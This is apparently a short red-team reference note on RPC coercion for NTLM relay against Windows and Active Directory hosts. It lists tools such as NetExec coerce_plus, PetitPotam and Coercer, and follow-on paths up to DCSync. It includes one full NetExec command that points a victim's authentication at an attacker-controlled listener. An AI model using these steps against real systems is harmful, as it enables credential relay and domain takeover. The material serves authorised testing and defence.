RPC Coercion

Force a Windows host to authenticate to your NTLM relay listener. The authenticating identity is usually the machine account of the target (e.g., SERVER$), unless the coerced service runs under a domain service account.

• Typical targets:

  • DCs (for AD CS/LDAPS relay)
  • Servers
  • Workstations

• SMB relay to DCs is blocked by default (signing). Prefer LDAPS or AD CS as relay targets.

Tools

nxc coerce_plus

Attempts coercion against a variety of RPC interfaces.

nxc smb <smb_server_to_coerce> -u <username> -p <password> -d <domain> -M coerce_plus -o LISTENER=<attacker_ip>

Petitpotam

Attempts coercion against hardcoded EFSRPC interfaces

Coercer scan

Only attempts RPC interfaces advertised by EPM

Coercer fuzz

Checks coercion against every known RPC interface

Attack Paths - If coercion is successful

• AD CS Template Abuse
  • See AD CS Abuse

    Check if any AD CS abuse exists from the context of the coerced victim's identity.

• Check for SMB share access across the environment, especially DCs.
• Resource Based Constrained Delegation (RBCD)

  If coerced request is relayed to LDAP/LDAP.

• DCSync